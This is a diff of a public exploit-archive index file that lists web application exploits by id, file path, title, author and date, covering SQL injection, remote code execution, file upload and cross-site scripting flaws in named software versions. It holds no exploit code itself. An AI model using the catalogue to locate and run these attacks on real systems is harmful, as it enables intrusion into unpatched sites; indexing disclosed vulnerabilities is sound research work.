6055,exploits/php/webapps/6055.pl,"Joomla! Component n-forms 1.01 - Blind SQL Injection",2008-07-12,"The Moorish",webapps,php,
6056,exploits/php/webapps/6056.txt,"WebCMS Portal Edition - 'id' SQL Injection",2008-07-12,Mr.SQL,webapps,php,
6057,exploits/php/webapps/6057.txt,"jsite 1.0 oe - SQL Injection / Local File Inclusion",2008-07-12,S.W.A.T.,webapps,php,
@ -23482,7 +23482,7 @@ id,file,description,date,author,type,platform,port
8555,exploits/php/webapps/8555.txt,"ABC Advertise 1.0 - Admin Password Disclosure",2009-04-27,SirGod,webapps,php,
8557,exploits/php/webapps/8557.html,"VisionLms 1.0 - 'changePW.php' Remote Password Change",2009-04-28,Mr.tro0oqy,webapps,php,
8558,exploits/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injections",2009-04-28,YEnH4ckEr,webapps,php,
8559,exploits/php/webapps/8559.c,"webSPELL 4.2.0d (Linux) - Local File Disclosure (C)",2009-04-28,StAkeR,webapps,php,
8559,exploits/php/webapps/8559.c,"webSPELL 4.2.0d (Linux) - Local File Disclosure",2009-04-28,StAkeR,webapps,php,
8563,exploits/php/webapps/8563.txt,"eLitius 1.0 - 'banner-details.php?id' SQL Injection",2009-04-29,snakespc,webapps,php,
8565,exploits/php/webapps/8565.txt,"ProjectCMS 1.0b - 'index.php?sn' SQL Injection",2009-04-29,YEnH4ckEr,webapps,php,
8566,exploits/php/webapps/8566.txt,"S-CMS 1.1 Stable - 'page' Local File Inclusion",2009-04-29,ZoRLu,webapps,php,
@ -36088,7 +36088,7 @@ id,file,description,date,author,type,platform,port
34518,exploits/jsp/webapps/34518.txt,"ManageEngine Desktop Central - Arbitrary File Upload / Remote Code Execution",2014-09-01,"Pedro Ribeiro",webapps,jsp,
34519,exploits/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities (1)",2014-09-01,"Hans-Martin Muench",webapps,jsp,8400
34524,exploits/php/webapps/34524.txt,"WordPress Plugin Huge-IT Image Gallery 1.0.1 - (Authenticated) SQL Injection",2014-09-02,"Claudio Viviani",webapps,php,80
34525,exploits/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python)",2014-09-02,"Dolev Farhi",webapps,multiple,
34525,exploits/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting",2014-09-02,"Dolev Farhi",webapps,multiple,
34637,exploits/php/webapps/34637.txt,"Joomla! Component com_formmaker 3.4 - SQL Injection",2014-09-12,"Claudio Viviani",webapps,php,
34684,exploits/php/webapps/34684.pl,"Joomla! Component com_spain - 'nv' SQL Injection",2010-09-20,FL0RiX,webapps,php,
34531,exploits/php/webapps/34531.txt,"BlastChat Client 3.3 - Cross-Site Scripting",2010-08-25,"Aung Khant",webapps,php,
@ -36206,7 +36206,7 @@ id,file,description,date,author,type,platform,port
34678,exploits/php/webapps/34678.txt,"WebStatCaffe - '/stat/pageviewerschart.php?date' Cross-Site Scripting",2009-08-29,Moudi,webapps,php,
34679,exploits/php/webapps/34679.txt,"WebStatCaffe - '/stat/referer.php?date' Cross-Site Scripting",2009-08-29,Moudi,webapps,php,
34680,exploits/hardware/webapps/34680.txt,"ZTE ZXDSL-931VII - Configuration Dump",2014-09-16,"L0ukanik0-s S0kniaku0l",webapps,hardware,
34681,exploits/php/webapps/34681.txt,"WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload (Python)",2014-09-16,"Claudio Viviani",webapps,php,
34681,exploits/php/webapps/34681.txt,"WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload",2014-09-16,"Claudio Viviani",webapps,php,
34682,exploits/ios/webapps/34682.txt,"USB&WiFi Flash Drive 1.3 iOS - Code Execution",2014-09-16,Vulnerability-Lab,webapps,ios,8080
34687,exploits/asp/webapps/34687.txt,"Smart ASP Survey - 'catid' SQL Injection",2009-08-27,Moudi,webapps,asp,
34688,exploits/php/webapps/34688.txt,"Basilic 1.5.13 - 'index.php' Cross-Site Scripting",2009-07-27,PLATEN,webapps,php,
@ -39613,13 +39613,13 @@ id,file,description,date,author,type,platform,port
43882,exploits/asp/webapps/43882.rb,"Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - (Authenticated) Arbitrary File Upload",2015-09-28,"Pedro Ribeiro",webapps,asp,
40961,exploits/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",webapps,multiple,
40966,exploits/php/webapps/40966.txt,"Joomla! Component Blog Calendar - SQL Injection",2016-12-26,X-Cisadane,webapps,php,
40968,exploits/php/webapps/40968.sh,"PHPMailer < 5.2.18 - Remote Code Execution (Bash)",2016-12-26,"Dawid Golunski",webapps,php,
40970,exploits/php/webapps/40970.php,"PHPMailer < 5.2.18 - Remote Code Execution (PHP)",2016-12-25,"Dawid Golunski",webapps,php,
40968,exploits/php/webapps/40968.sh,"PHPMailer < 5.2.18 - Remote Code Execution",2016-12-26,"Dawid Golunski",webapps,php,
40970,exploits/php/webapps/40970.php,"PHPMailer < 5.2.18 - Remote Code Execution",2016-12-25,"Dawid Golunski",webapps,php,
40969,exploits/php/webapps/40969.pl,"PHPMailer < 5.2.20 - Remote Code Execution",2016-12-27,"Dawid Golunski",webapps,php,
40971,exploits/php/webapps/40971.txt,"WordPress Plugin Simply Poll 1.4.1 - SQL Injection",2016-12-28,"TAD GROUP",webapps,php,
40972,exploits/php/webapps/40972.php,"SwiftMailer < 5.4.5-DEV - Remote Code Execution",2016-12-28,"Dawid Golunski",webapps,php,
40973,exploits/php/webapps/40973.txt,"Joomla! Component aWeb Cart Watching System for Virtuemart 2.6.0 - SQL Injection",2016-12-28,qemm,webapps,php,
40974,exploits/php/webapps/40974.py,"PHPMailer < 5.2.18 - Remote Code Execution (Python)",2016-12-29,anarc0der,webapps,php,
40974,exploits/php/webapps/40974.py,"PHPMailer < 5.2.18 - Remote Code Execution",2016-12-29,anarc0der,webapps,php,
40976,exploits/php/webapps/40976.txt,"WordPress Plugin Slider Templatic Tevolution < 2.3.6 - Arbitrary File Upload",2016-12-29,r3m1ck,webapps,php,
40977,exploits/hardware/webapps/40977.txt,"Dell SonicWALL Global Management System GMS 8.1 - Blind SQL Injection",2016-12-29,LiquidWorm,webapps,hardware,
40978,exploits/hardware/webapps/40978.txt,"Dell SonicWALL Secure Mobile Access SMA 8.1 - Cross-Site Scripting / Cross-Site Request Forgery",2016-12-29,LiquidWorm,webapps,hardware,
@ -39782,7 +39782,7 @@ id,file,description,date,author,type,platform,port
41208,exploits/hardware/webapps/41208.txt,"Netman 204 - Backdoor Account / Password Reset",2017-01-31,"Simon Gurney",webapps,hardware,
41209,exploits/php/webapps/41209.txt,"Joomla! Component JTAG Calendar 6.2.4 - 'search' SQL Injection",2017-01-28,"Persian Hack Team",webapps,php,
41210,exploits/php/webapps/41210.txt,"LogoStore - 'query' SQL Injection",2017-02-01,"Kaan KAMIS",webapps,php,
41223,exploits/linux/webapps/41223.py,"WordPress Core 4.7.0/4.7.1 - Content Injection (Python)",2017-02-02,leonjza,webapps,linux,
41223,exploits/linux/webapps/41223.py,"WordPress Core 4.7.0/4.7.1 - Content Injection",2017-02-02,leonjza,webapps,linux,
41224,exploits/linux/webapps/41224.rb,"WordPress Core 4.7.0/4.7.1 - Content Injection (Ruby)",2017-02-02,"Harsh Jaiswal",webapps,linux,
41231,exploits/php/webapps/41231.txt,"Itech Travel Portal Script 9.35 - SQL Injection",2017-02-02,"Ihsan Sencan",webapps,php,
41225,exploits/php/webapps/41225.txt,"Property Listing Script - 'propid' Blind SQL Injection",2017-02-02,"Kaan KAMIS",webapps,php,
@ -43319,7 +43319,6 @@ id,file,description,date,author,type,platform,port
48714,exploits/php/webapps/48714.txt,"pfSense 2.4.4-p3 - Cross-Site Request Forgery",2020-07-26,ghost_fh,webapps,php,
48715,exploits/php/webapps/48715.txt,"Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting",2020-07-26,"Peter Blue",webapps,php,
48716,exploits/ruby/webapps/48716.rb,"Rails 5.0.1 - Remote Code Execution",2020-07-26,"Lucas Amorim",webapps,ruby,
49294,exploits/php/webapps/49294.txt,"Wordpress Plugin Contact Form 7 5.3.1 - Unrestricted File Upload",2020-12-21,"Ramón Vila Ferreres",webapps,php,
48720,exploits/php/webapps/48720.py,"eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution",2020-07-27,"Berk KIRAS",webapps,php,
48722,exploits/hardware/webapps/48722.txt,"Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion",2020-07-28,0xmmnbassel,webapps,hardware,
48723,exploits/hardware/webapps/48723.sh,"Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion",2020-07-29,0xmmnbassel,webapps,hardware,
@ -43685,3 +43684,11 @@ id,file,description,date,author,type,platform,port
49487,exploits/php/webapps/49487.rb,"Fuel CMS 1.4.1 - Remote Code Execution (2)",2021-01-28,"Alexandre ZANNI",webapps,php,
49488,exploits/aspx/webapps/49488.py,"Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)",2021-01-28,"Alexandre ZANNI",webapps,aspx,
49490,exploits/php/webapps/49490.txt,"WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution",2021-01-28,ABDO10,webapps,php,
49492,exploits/php/webapps/49492.txt,"BloofoxCMS 0.5.2.1 - 'text' Stored Cross Site Scripting",2021-01-29,LiPeiYi,webapps,php,
49493,exploits/php/webapps/49493.txt,"Online Grading System 1.0 - 'uname' SQL Injection",2021-01-29,"Ruchi Tiwari",webapps,php,
49494,exploits/php/webapps/49494.py,"Quick.CMS 6.7 - Remote Code Execution (Authenticated)",2021-01-29,mari0x00,webapps,php,
49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Path Traversal to Account Takeover",2021-01-29,Lyghtnox,webapps,python,
49496,exploits/php/webapps/49496.txt,"MyBB Hide Thread Content Plugin 1.0 - Information Disclosure",2021-01-29,0xB9,webapps,php,
49497,exploits/php/webapps/49497.txt,"Simple Public Chat Room 1.0 - Authentication Bypass SQLi",2021-01-29,"Richard Jones",webapps,php,
49498,exploits/php/webapps/49498.txt,"Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting",2021-01-29,"Richard Jones",webapps,php,
49499,exploits/hardware/webapps/49499.py,"SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated)",2021-01-29,"Darren Martyn",webapps,hardware,

Can't render this file because it is too large.